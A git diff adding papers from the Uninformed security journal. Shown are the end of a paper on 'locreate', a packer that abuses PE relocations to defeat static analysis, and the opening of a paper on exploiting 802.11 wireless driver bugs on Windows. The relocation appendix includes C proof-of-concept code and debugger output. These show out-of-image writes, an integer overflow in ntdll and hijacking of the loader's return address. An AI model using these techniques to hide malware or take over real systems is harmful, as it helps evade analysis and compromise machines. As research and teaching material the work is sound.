flags + Initialized Data + Discardable + Read Only + +In order to validate that this executable contains relocation information for +the absolute address reference made to the ``Hello World!'' string, the +dumpbin.exe /relocations command can be used: + +File Type: EXECUTABLE IMAGE + +BASE RELOCATIONS #5 + 1000 RVA, A8 SizeOfBlock + 14 HIGHLOW 00421000 + 2C HIGHLOW 00420350 +... + +This output shows the first relocation block which describes the RVA 0x1000. +Each line below the relocation block header describes the individual fixup +descriptors. The information displayed includes the offset into the page, the +type of transformation being performed, and the current value at that location +in the binary. From the disassembly above, the location of the address +reference that is being made is 0x00401014. Therefore, the very first fixup +in this relocation block provides the dynamic loader within the information +necessary to change the address reference to the new base address when the +binary is relocated. If this binary were to be relocated to 0x50000000, the +HIGHLOW transformation would be applied to 0x00401014 as follows. The +displacement between the new base address and the old address would be +calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to +the existing value of 0x00421000 produces 0x50021000 which is subsequently +stored in 0x00401014. This causes the absolute address reference to become +relative to the new base address. + +Based on this basic understanding of how relocations are processed, it's now +possible to describe how a packer can be implemented that takes advantage of +the way the dynamic loader processes relocation information. As has been +illustrated above, relocation information is designed to make it possible to +fixup absolute address references at runtime when a binary is relocated. +These fixups are applied by taking into account the displacement between the +new base address and the original base address. More often than not, this +displacement isn't known ahead of time, thus making it impossible to reliably +predict how the content at a specific location in the binary will be altered. +But what if it were possible to deterministically know the displacement in +advance? Knowing the displacement in advance would make it possible to alter +various locations of the binary in a manner that would permit the original +values to be restored by relocations at runtime. In effect, the on-disk +version of the binary could be made to appear quite different from the +in-memory version at runtime. This is the basic concept behind locreate. + +In order for locreate to work it must be possible to predict the displacement +reliably. Since the displacement is calculated in relation to the preferred +base address and the expected base address, both values must be known. +Furthermore, the binary must be relocated every time it executes in order for +the relocations to be applied. As it happens, both of these problems can be +solved at once. Since a binary is only guaranteed to be relocated if its +preferred base address is in conflict with an existing address, a preferred +base address must be selected that will always lead to a conflict. This can +be accomplished by setting the preferred base address to any invalid user-mode +address (any address above 0x80000000 inclusive). This assumes that the machine +that the executable will run on is not running with /3GB. If so, a higher +address would have to be used.. Alternatively, the base address can be set to +SharedUserData which is guaranteed to be located at 0x7ffe0000 in every +process. Setting the binary's preferred base address to any of these +addresses will force it to be relocated every time it executes. The only +unknown is what address the binary is expected to be relocated to. + +Determining the address that will be relocated to depends on the state of the +process' address space at the time that the binary is relocated. If the +binary that's being relocated is an executable, then the process' address +space is generally in a pristine state since the executable is one of the +first things to be mapped into the address space. As such, the first +available address will always be 0x10000 on default installations of Windows. +If the binary is a DLL, it's hard to predict what the state of the address +space will be in all cases. When a conflict does occur, the kernel searches +for an available address region by traversing from lowest to highest address. +For the purposes of this paper, it will be assumed that an executable is being +packed and that the address being relocated to is 0x10000. Further research +may provide insight into how to better control or alter the expected base +address. + +With both the preferred base address and the expected base address known, the +only thing that remains is to perform the operations that will transform the +on-disk version of the binary in a manner that causes custom relocations to +restore the binary to its original form at runtime. This process can be both +simplistic and complicated. The simplest approach would be to enumerate over +the contents of each section in the binary, altering the value at each +location by subtracting the displacement and then creating a relocation fixup +descriptor that will ensure that the contents are restored to the expected +value at runtime. This is how the proof of concept works. A more complicated +approach would be to create multiple relocation fixup descriptors per-address. +This would mean that the displacement would need to be subtracted once for +each fixup descriptor. It should also be possible to apply relocations to +individual bytes within a four byte span rather than applying relocations in +four byte increments. Even more interesting would be to use some fixup types +other than HIGHLOW, although this could be seen as something that might make +generating a signature easier. + +The end result of this whole process is a functional proof of concept that +packs a binary in the manner described above. To get a feel for how different +the binary looks after being packed, consider what the implementation of main +from earlier in this paper looks like. Notice how the first two instructions +are the same as they were previously. This has to do with the fact that base +addresses must align on 64KB boundaries, and thus the lower two bottoms are +not changed. This could be further improved such as through the strategies +described above: + +.text:84011000 loc_84011000: +.text:84011000 push ebp +.text:84011001 mov ebp, esp +.text:84011003 in al, dx +.text:84011004 add [eax+0], dh +.text:84011006 add [edi+edi*8+1209C15h], eax +.text:8401100D test [ebx-3FCCFB3Ch], al +.text:84011013 loope near ptr 84010FD8h +.text:84011015 +.text:84011015 loc_84011015: +.text:84011015 push (offset off_8401139C+1) + +The locreate proof of concept has been tested on Windows XP and Windows 2003 +Server. Initial testing on Windows Vista indicates that Vista does not +properly alter the entry point address after relocations have been applied +when an executable is packed. Even though the proof of concept implementation +works, there are a number of more fundamental problems with the technique +itself. + +The first set of problems has to do with techniques that can be used to +signature locreate packed executables. Since locreate relies on injecting a +large number of relocation fixups, it may be possible to heuristically detect +an increased number of relocation fixups with relation to the size of +individual segments. This particular attack could be solved by decreasing the +number of relocation fixups injected by locreate. This would have the effect +of only partially mangling the binary, but it might be enough to make people +wonder what's going on without giving things away. Even if it weren't +possible to heuristically detect an increased number of relocation fixups, +it's definitely possible to detect the fact that an executable packed by +locreate will have an invalid preferred base address that will always result +in a conflict. This fact alone makes it mostly trivial to at least detect +that something odd is going on. + +Detection is only the first problem, however. Once a locreate packed +executable has been detected, the next logical step is to attempt to figure +out some way of obtaining the original executable. Since locreate relies on +relocation fixups to do this, the only thing one would have to do in order to +obtain the original binary would be to relocate the executable to the expected +base address that was used when the binary was packed, such as 0x10000. While +it's trivial to develop tools to perform this action, the Interactive +Disassembler (IDA) already supports it. When opening an executable, the +``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the +user to enter the base address that the binary should be loaded at. When the +base address is entered, IDA processes relocations and presents the relocated +binary image. The mitigating factor here is that the user must know the +expected base address, otherwise the binary will still appear completely +mangled when it's relocated to the wrong base address. + +In the author's opinion, these problems make locreate a sub-par packer. At +best it should be viewed as an interesting approach to the problem of packing +executables, but it should not be relied upon as a means of thwarting static +analysis. Anyone who reads this paper will have the tools necessary to unpack +executables that have been packed by locreate. With that said, it should be +noted that there is still an opportunity for further research that could help +to identify ways of improving locreate. For instance, a better understanding +of differences in the way the dynamic loader and existing static analysis +tools process relocation fixups could provide some opportunity for +improvement. Results from some of the author's initial tests of these ideas +are included in appendix A. Here's a brief list of some differences that could +exist: + + 1. Different behaviors when processing fixups + + It's possible that the dynamic loader and static analysis tools such as IDA + may not support the same set of fixup types. Furthermore, they may not + process fixup types in the same way. If differences do exist, it may be + possible to create a packed executable that will work correctly when used + against the dynamic loader but not render properly when relocated using a + static analysis tool such as IDA. + + 2. Relocation blocks with non-page-aligned VirtualAddress fields + + It's unknown whether or not the dynamic loader and static analysis tools are + able to properly handle relocation blocks that have non-page-aligned + VirtualAddress's. In all normal circumstances, VirtualAddress will be + page aligned. + + 3. Relocation blocks that modify other relocation blocks + + An interesting situation that may lead to differences between the dynamic + loader and static analysis tools has to do with relocation blocks that modify + other relocation blocks. In this way, the relocation information that exists + on disk is not what is actually used, in its entirety, when relocating an + image during runtime. + +Even if research into these topics doesn't yield any direct improvements to +locreate, it should nonetheless provide some interesting insight into the way +that different applications handle relocation processing. And after all, +gaining knowledge is what it's really all about. + +Appendix A) Differences in Relocation Processing + +This appendix attempts to describe some tests that were run on different +applications that process relocation entries for binary files. Identifying +differences may make it possible to have a binary that will work correctly +when executed but not when analyzed by a static analysis tool such as IDA. To +test out these ideas, the author threw together a small relocation fuzzing +tool that is aptly named relocfuzz. This tool will take a pre-existing binary +and create a new one with custom relocations. The code for this tool can be +found in the other code associated with this paper. + +The tests included in this appendix were performed against three different +applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same +tests are run against other applications, the author would be interested in +knowing the results. + +A.1) Non-page-aligned Block VirtualAddress + +In all normal cases, relocation blocks will be created with a page-aligned +VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress +fields will be handled correctly when relocations are processed. There are +some interesting implications of non-page-aligned VirtualAddress's. In many +applications, such as the dynamic loader, it's critical that addresses +referenced through RVAs are validated so as to prevent references being made +to external addresses. For example, if relocations were processed in +kernel-mode, it would be critical that checks be performed to ensure that RVAs +don't end up making it possible to reference kernel-mode addresses. The +reason why non-page-aligned VirtualAddress's are interesting is because they +leave open the possibility of this type of attack. + +Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring +for the moment that SharedUserData already exists at this location. Now, +consider that this binary has a relocation block with a virtual address of +0x1ffff. This address is not page-aligned. Now, consider that this +relocation block has a fixup descriptor that indicates that at offset 0x4 into +this page, a certain type of fixup should be performed. This would equate to +modifying memory at 0x80000003, a kernel-mode address. If relocations were +being processed in kernel-mode, like they are on Windows Vista for ASLR, then +a failure to check that the actual address being written to would result in a +dangerous condition. + +Here's an example of some code that attempts to test out this idea: + +static VOID TestNonPageAlignedBlocks( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1); + + PrependRelocationBlockContext( + FuzzContext, + KillerBlock); + + KillerBlock->Rva = 0x10001; + KillerBlock->Fixups[0] = (3 << 12) | 0; +} + +In this example, a custom relocation block is created with one fixup +descriptor. The VirtualAddress associated with the block is set to 0x10001 +and the first fixup descriptor is set to modify offset 0 into that RVA. If +the binary that is hosting these relocations is relocated to 0x10000, a write +should occur to 0x20001 when processing the relocations. Here are the results +from a few initial tests: + +ntdll.dll: The relocation fixup is processed and results in a write +to 0x20001. + +IDA: Ignores the relocation fixup, but only because it writes outside of the +executable from what it would appear. + +dumpbin.exe: Parses the relocation block without issue. + +A.2) Writing to External Addresses + +Due to the fact that the VirtualAddress associated with each relocation block +is a 32-bit RVA, it is possible to create relocation blocks that have RVAs +that actually reside outside of the mapped executable that is being relocated. +This is important because if steps aren't taken to detect this scenario, the +application processing the relocation fixups might be tricked into writing to +memory that is external to the mapped binary. Creating a test-case for this +example is trivial: + +static VOID CreateExternalWriteRelocationBlock( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2); + + ExtBlock->Rva = 0x10000; + ExtBlock->Fixups[0] = (3 << 12) | 0x0; + ExtBlock->Fixups[1] = (3 << 12) | 0x1; + + PrependRelocationBlockContext( + FuzzContext, + ExtBlock); +} + +In this test, a relocation block is created that has a VirtualAddress of +0x10000. When the binary is relocated to 0x10000, the actual address of the +region that will be written to is 0x20000. In almost all versions of Windows +NT, this address is the location of the process parameters structure. The +block itself contains two fixup descriptors, each of which will result in a +write to the first few bytes of the process parameters structure. The results +after running this test are: + +ntdll.dll: The relocation fixup is processed and results in two 32-bit writes +to 0x20000 and 0x20001. + +IDA: Ignores RVAs outside of the executable. + +dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups. + +A.3) Self-updating Relocation Blocks + +One of the more interesting nuisances about the way relocation fixups are +processed is that it's actually possible to create a relocation block that +will perform fixups against other relocation blocks. This has the effect of +making it such that the relocation information that appears on disk is +actually different than what is processed when relocation fixups are applied. +The basic idea behind this approach is to prepend certain relocation blocks +that apply fixups to subsequent relocation blocks. This all works because +relocation blocks are typically processed in the order that they appear. An +example of this basic concept is described shown below: + +static VOID PrependSelfUpdatingRelocations( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT SelfBlock; + PRELOCATION_BLOCK_CONTEXT RealBlock; + ULONG RelocBaseRva; + ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks; + ULONG Count; + + // + // Grab the base address that relocations will be loaded at + // + RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress; + + // + // Grab the first block before we start prepending + // + RealBlock = FuzzContext->NewRelocationBlocks; + + // + // Prepend self-updating relocation blocks for each block that exists + // + for (Count = 0; Count < NumberOfBlocks; Count++) + { + PRELOCATION_BLOCK_CONTEXT RelocationBlock; + + RelocationBlock = AllocateRelocationBlockContext(2); + + PrependRelocationBlockContext( + FuzzContext, + RelocationBlock); + } + + // + // Walk through each self updating block, fixing up the real blocks to + // account for the amount of displacement that will be added to their Rva + // attributes. + // + for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0; + Count < NumberOfBlocks; + Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next) + { + SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset; + + // + // We'll relocate the two least significant bytes of the real block's RVA + // and SizeOfBlock. + // + SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) | + (((RealBlock->RelocOffset - 2) & 0xfff))); + SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) | + (((RealBlock->RelocOffset + 2) & 0xfff))); + SelfBlock->Rva &= ~(PAGE_SIZE-1); + + // + // Account for the amount that will be added by the dynamic loader after + // the first self-updating relocation blocks are processed. + // + *(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2; + *(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2; + } +} + +This test works by prepending a self-updating relocation block for each +relocation block that exists in the binary. In this way, if there were two +relocations blocks that already existed, two self-updating relocation blocks +would be prepended, one for each of the two existing relocation blocks. +Following that, the self-updating relocation blocks are populated. Each +self-updating relocation block is created with two fixup descriptors. These +fixup descriptors are used to apply fixups to the VirtualAddress and +SizeOfBlock attributes of its corresponding existing relocation block. Since +a HIGHLOW fixup only applies to two most significant bytes, the RVAs of the +corresponding fields are adjusted down by two. The end result of this +operation is that the first n relocation blocks are responsible for fixing up +the VirtualAddress and SizeOfBlock attributes associated with subsequent +relocation blocks. When relocations are processed in a linear fashion, the +subsequent relocation blocks are updated in a way that allows them to be +processed correctly. + +Running this test against the set of test applications produces the following +results: + +ntdll.dll: The relocation blocks are fixed up accordingly and the application +executes as expected. + +IDA: Initial testing indicates that IDA is capable of handling self-updating +relocation blocks. + +dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks: + +DUMPBIN : fatal error LNK1000: + Internal error during + DumpBaseRelocations + + Version 8.00.50727.42 + + ExceptionCode = C0000005 + ExceptionFlags = 00000000 + ExceptionAddress = 00443334 + NumberParameters = 00000002 + ExceptionInformation[ 0] = 00000000 + ExceptionInformation[ 1] = 7FFA2000 + +CONTEXT: + Eax = 0000000A Esp = 0012E500 + Ebx = 00004F00 Ebp = 00000000 + Ecx = 7FFA2000 Esi = 00000000 + Edx = 781C3B68 Edi = 7FFA2000 + Eip = 00443334 EFlags = 00010293 + SegCs = 0000001B SegDs = 00000023 + SegSs = 00000023 SegEs = 00000023 + SegFs = 0000003B SegGs = 00000000 + Dr0 = 00000000 Dr3 = 00000000 + Dr1 = 00000000 Dr6 = 00000000 + Dr2 = 00000000 Dr7 = 00000000 + +A.4) Integer Overflows in Size Calculations + +A potential source of mistakes that could be made when processing relocations +has to do with the handling of the SizeOfBlock attribute of a relocation +block. There is a potential for an integer overflow to occur in applications +that don't properly handle situations where the SizeOfBlock attribute is less +than the size of the base relocation structure (which is 8 bytes). In order +to calculate the total number of fixups in a section, it's common to see a +calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made +to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If +this happens, the application processing relocations would be tricked into +processing a very large number of relocations. An example of a test for this +issue is shown below: + +static VOID TestIntegerOverflow( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0); + + EvilBlock->SizeOfBlock = 0; + EvilBlock->Rva = 0x1000; + + PrependRelocationBlockContext( + FuzzContext, + EvilBlock); +} + +In this example, a relocation block is created that has its SizeOfBlock +attribute set to zero. This is invalid because the minimum size of a block is +8 bytes. The results of this test against different applications are shown +below: + +ntdll.dll: Does not perform appropriate checks which appears to result in an +integer overflow: + +(9d4.6dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff +eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +ntdll!LdrProcessRelocationBlockLongLong+0x1a: +7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=???? + +IDA: Ignores the relocation block, but may not process relocations correctly +as a result (unclear at this point). + +dumpbin.exe: Refuses to show relocations: + +Microsoft (R) COFF/PE Dumper Version 8.00.50727.42 +Copyright (C) Microsoft Corporation. All rights reserved. + +Dump of file foo.exe + +File Type: EXECUTABLE IMAGE + +BASE RELOCATIONS #4 + + Summary + + 1000 .data + 1000 .rdata + 1000 .reloc + 1000 .text + +A.5) Consistent Handling of Fixup Types + +Applications that process relocation fixups may also differ in their level of +support for different types of fixups. While most binaries today use the +HIGHLOW fixup exclusively, there are still quite a few other types of fixups +that can be applied. If differences in the way relocation fixups are +processed can be identified, it may be possible to create a binary that +relocates correctly in one application but not in another application. The +following code demonstrates an example of this type of test: + +static VOID TestConsistentRelocations( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16); + ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress; + INT Index; + + PrependRelocationBlockContext( + FuzzContext, + Block); + + Block->Rva = 0x1000; + + for (Index = 0; Index < 16; Index++) + { + // + // Skip invalid fixup types + // + if ((Index >= 6 && Index <= 8) || + (Index >= 0xb && Index <= 0x10)) + continue; + + Block->Fixups[Index] = (Index << 12) | Index; + } +} + +This test works by prepending a relocation block that contains a relocation +fixup for each different valid fixup type. This results in a relocation block +that looks something like this: + +BASE RELOCATIONS #4 + 1000 RVA, 28 SizeOfBlock + 0 ABS + 1 HIGH EC8B + 2 LOW 8BEC + 3 HIGHLOW 5008458B + 4 HIGHADJ 0845 (5005) + 0 ABS + 0 ABS + 0 ABS + 9 IMM64 + A DIR64 8000209C15FF8000 + 0 ABS + 0 ABS + 0 ABS + 0 ABS + 0 ABS + +The results for this test are shown below: + + +ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs +all fixup types correctly. This results in the following code being produced +in the test binary: + +foo+0x1000: +00011000 55 push ebp +00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs +00011005 895068 mov dword ptr [eax+68h],edx +00011008 1830 sbb byte ptr [eax],dh +0001100a 0100 add dword ptr [eax],eax +0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh +00011012 83c408 add esp,8 + +IDA: Appears to handle some relocation fixup types differently than the +dynamic loader. The result of IDA relocating the same binary results in the +following being produced: + +.text:00011000 push ebp +.text:00011001 mov ebp, esp +.text:00011003 mov eax, [ebp+9] +.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n" +.text:00011009 xor [ecx], al +.text:00011009 +.text:0001100B db 0 +.text:0001100C +.text:0001100C add byte ptr ds:printf[esi], dl +.text:00011012 add esp, 8 + +Equates to: + +.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20 +.text:00011010 01 00 83 C4 08 C7 05 50 + +dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups. + +A.6) Hijacking the Dynamic Loader + +Since the dynamic loader in previous tests proved to be capable of writing to +areas of memory external to the executable binary, it makes sense to test to +see if it's possible to hijack execution control. One method of approaching +this would be to have the dynamic loader apply a relocation to the return +address of the function used to process relocations. When the function +returns, it'll transfer control to whatever address the relocations have +caused it to point to. An example of this code for this test is shown below: + +static VOID TestHijackLoader( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1); + + PrependRelocationBlockContext( + FuzzContext, + Block); + + // + // Set the RVA to the address of the return address on the stack taking into + // account the displacement. + // + Block->Rva = 0x0012fab0; + Block->Fixups[0] = (3 << 12) | 0; +} + +When a binary is executed that contains this relocation block, the dynamic +loader ends up applying a relocation to the return address located at +0x13fab0. Obviously, this address may be subject to change quite frequently, +but as a means of illustrating a proof of concept it should be sufficient. +And, just as one would expect, the dynamic loader does indeed overwrite the +return address and make it possible to gain control of execution: + +(c88.184): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001 +edi=ffffffff eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +fc92e10b ?? ??? +0:000> kv +ChildEBP RetAddr Args to Child +WARNING: Frame IP not in any known module. Following frames may be wrong. +0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b +0013fae4 7c91e08c 00010000 00000000 00000000 image00010000 +0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo]) +0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo]) +0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo]) +00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7 + +Bibliography + +[1] Carrera, Ero. Packer Tracing. + http://nzight.blogspot.com/2006/06/packer-tracing.html; + accessed Dec 15, 2006. + +[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits. + http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1; + accessed Jan 8, 2007. + +[3] Szor, Peter. Tricky Relocations. + http://peterszor.com/resurrel.pdf; + accessed Jan 8, 2007. diff --git a/uninformed/6.3.txt b/uninformed/6.3.txt new file mode 100644 index 0000000..eb06b8a --- /dev/null +++ b/uninformed/6.3.txt @@ -0,0 +1,1570 @@ +Exploiting 802.11 Wireless Driver Vulnerabilities on Windows +11/2006 +Johnny Cache (johnycsh[a t]802.11mercenary.net) +H D Moore (hdm[a t]metasploit.com) +skape (mmiller[a t]hick.org) + +1) Foreword + +Abstract: This paper describes the process of identifying and exploiting +802.11 wireless device driver vulnerabilities on Windows. This process is +described in terms of two steps: pre-exploitation and exploitation. The +pre-exploitation step provides a basic introduction to the 802.11 protocol +along with a description of the tools and libraries the authors used to create +a basic 802.11 protocol fuzzer. The exploitation step describes the common +elements of an 802.11 wireless device driver exploit. These elements include +things like the underlying payload architecture that is used when executing +arbitrary code in kernel-mode on Windows, how this payload architecture has +been integrated into the 3.0 version of the Metasploit Framework, and the +interface that the Metasploit Framework exposes to make developing 802.11 +wireless device driver exploits easy. Finally, three separate real world +wireless device driver vulnerabilities are used as case studies to illustrate +the application of this process. It is hoped that the description and +illustration of this process can be used to show that kernel-mode +vulnerabilities can be just as dangerous and just as easy to exploit as +user-mode vulnerabilities. In so doing, awareness of the need for more robust +kernel-mode exploit prevention technology can be raised. + +Thanks: The authors would like to thank David Maynor, Richard Johnson, and +Chris Eagle. + +2) Introduction + +Software security has matured a lot over the past decade. It has gone from +being an obscure problem that garnered little interest from corporations to +something that has created an industry of its own. Corporations that once saw +little value in investing resources in software security now have entire teams +dedicated to rooting out security issues. The reason for this shift in +attitude is surely multifaceted, but it could be argued that the greatest +influence came from improvements to exploitation techniques that could be used +to take advantage of software vulnerabilities. The refinement of these +techniques made it possible for reliable exploits to be used without any +knowledge of the vulnerability. This shift effectively eliminated the already +thin crutch of barrier-to-entry complacency which many corporations were +guilty of leaning on. + +Whether or not the refinement of exploitation techniques was indeed the +turning point, the fact remains that there now exists an industry that has +been spawned in the name of software security. Of particular interest for the +purpose of this paper are the corporations and individuals within this +industry that have invested time in researching and implementing solutions +that attempt to tackle the problem of exploit prevention. As a result of this +time investment, things like non-executable pages, address space layout +randomization (ASLR), stack canaries, and other novel preventative measures +are becoming common place in the desktop market. While there should be no +argument that the main-stream integration of many of these technologies is a +good thing, there's a problem. + +This problem centers around the fact that the majority of these exploit +prevention solutions to date have been slightly narrow-sighted in their +implementations. In particular, these solutions generally focus on preventing +exploitation in only one context: user-mode. This is not true in all cases. +The authors would like to take care to mention that solutions like grsecurity +from the PaX team have had support for features that help to provide +kernel-level security. Furthermore, stack canary implementations have existed +and are integrated with many mainstream kernels. However, not all device +drivers have been compiled to take advantage of these new enhancements. The +reason for this narrow-sightedness is often defended based on the fact that +kernel-mode vulnerabilities have been far less prevalent. Furthermore, +kernel-mode vulnerabilities are considered by most to require a much more +sophisticated attack when compared with user-mode vulnerabilities. + +The prevalence of kernel-mode vulnerabilities could be interpreted in many +different ways. The naive way would be to think that kernel-mode +vulnerabilities really are few and far between. After all, this is code that +should have undergone rigorous code coverage testing. A second interpretation +might consider that kernel-mode vulnerabilities are more complex and thus +harder to find. A third interpretation might be that there are fewer eyes +focused on looking for kernel-mode vulnerabilities. While there are certainly +other factors, the authors feel that it is probably best captured by the +second and third interpretation. + +Even if prevalence is affected because of the relative difficulty of +exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit +prevention solutions to simply ignore it. The past has already shown that +exploitation techniques for user-mode vulnerabilities were refined to the +point of creating increasingly reliable exploits. These increasingly reliable +exploits were then incorporated into automated worms. What's so different +about kernel-mode vulnerabilities? Sure, they are complicated, but so were +heap overflows. The authors see no reason to expect that kernel-mode +vulnerabilities won't also experience a period of revolutionary public +advancements to existing exploitation techniques. In fact, this period has +already started[5,2,1]. Still, most corporations seem content to lean on the same +set of crutches, waiting for proof that a problem really exists. It's hoped +that this paper can assist in the process of making it clear that kernel-mode +vulnerabilities can be just as easy to exploit as user-mode vulnerabilities. + +It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. +The intense focus put upon preventing the exploitation of user-mode +vulnerabilities has caused kernel-mode security to lag behind. This lag is +further complicated by the fact that developers who write kernel-mode software +must generally have a completely different mentality relative to what most +user-mode developers are acustomed to. This is true regardless of what +operating system a programmer might be dealing with (so long as it's a +task-oriented operating system with a clear separation between system and +user). User-mode programmers who decide to dabble in writing device drivers +for NT will find themselves in for a few surprises. The most apparent thing +one would notice is that the old Windows Driver Model (WDM) and the new +Windows Driver Framework (WDF) represent completely different APIs relative to +what a user-mode developer would be familiar with. There are a number of +standard C runtime artifacts that can still be used, but their use in device +driver code stands out like a sore thumb. This fact hasn't stopped developers +from using dangerous string functions. + +While the API being completely different is surely a big hurdle, there are a +number of other gotchas that a user-mode programmer wouldn't normally find +themselves worrying about. One of the most interesting limitations imposed +upon device driver developers is the conservation of stack space. On modern +derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 +bytes) of stack space. In user-mode, thread stacks will generally grow as +large as 256KB (this default limit is controlled by the optional header of an +executable binary). Due to the limited amount of kernel-mode thread stack +space, it should be rare to ever see a device driver consuming a large amount +of space within a stack frame. Nevertheless, it was observed that the Intel +Centrino drivers have multiple instances of functions that consume over 1 page +of stack space. That's 33% of the available stack space wasted within one +stack frame! + +Perhaps the most important of all of the differences is the extra care that +must be taken when it comes to dealing with things like performance, error +handling, and re-entrancy. These major elements are critical to ensuring the +stability of the operating system as a whole. If a programmer is negligent in +their handling of any of these things in user-mode, the worst that will happen +is the application will crash. In kernel-mode, however, a failure to properly +account for any of these elements will generally affect the stability of the +system as a whole. Even worse, security related flaws in device drivers +provide a point of exposure that can result in super-user privileges. + +From this very brief introduction, it is hoped that the reader will begin to +realize that device driver development is a different world. It's a world +that's filled with a greater number of restrictions and problems, where the +implications of software bugs are much greater than one would normally see in +user-mode. It's a world that hasn't yet received adequate attention in the +form of exploit prevention technology, thus making it possible to improve and +refine kernel-mode exploitation techniques. It should come as no surprise +that such a world would be attractive to researchers and tinkerers alike. + +This very attraction is, in fact, one of the major motivations for this paper. +While the authors will focus strictly on the process used to identify and +exploit flaws in wireless device drivers, it should be noted that other device +drivers are equally likely to be prone to security issues. However, most other +device drivers don't have the distinction of exposing a connectionless layer2 +attack surface to all devices in close proximity. Frankly, it's hard to +get much cooler than that. That only happens in the movies, right? + +To kick things off, the structure of this paper is as follows. In chapter 3, +the steps used to find vulnerabilities in wireless device drivers, such as +through the use of fuzzing, are described. Chapter 4 explains the process of +actually leveraging a device driver vulnerability to execute arbitrary code +and how the 3.0 version of the Metasploit Framework has been extended to make +this trivial to deal with. Finally, chapter 5 provides three real world +examples of wireless device driver vulnerabilities. Each real world example +describes the trials and tribulations of the vulnerability starting with the +initial discovery and ending with arbitrary code execution. + +3) Pre-Exploitation + +This chapter describes the tools and strategies used by the authors to +identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a +basic description of the 802.11 protocol in order to provide the +reader with information necessary to understand the attack surface that is +exposed by 802.11 device drivers. Section 3.2 describes the basic interface +exposed by the 3.0 version of the Metasploit Framework that makes it possible +to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic +approach to fuzzing certain aspects of the way a device driver handles certain +802.11 protocol functions. + +3.1) Attack Surface + +Device drivers suffer from the same types of vulnerabilities that apply to any +other code written in the C programming language. Buffer mismanagement, faulty +pointer math, and integer overflows can all lead to exploitable conditions. +Device driver flaws are often seen as a low risk issue due to the fact that +most drivers do not process attacker-controlled data. The exception, of +course, are drivers for networking devices. Although Ethernet devices (and +their drivers) have been around forever, the simplicity of what the driver has +to handle has greatly limited the attack surface. Wireless drivers are +required to handle a wider range of requests and are also required to expose +this functionality to anyone within range of the wireless device. + +In the world of 802.11 device drivers, the attack surface changes based on the +state of the device. The three primary states are: + + 1. Unauthenticated and Unassociated + 2. Authenticated and Unassociated + 3. Authenticated and Associated + +In the first state, the client is not connected to a specific wireless +network. This is the default state for 802.11 drivers and will be the focus +for this section. The 802.11 protocol defines three different types of frames: +Control, Management, and Data. These frame types are further divided into +three classes (1, 2, and 3). Only frames in the first class are processed in +the Unauthenticated and 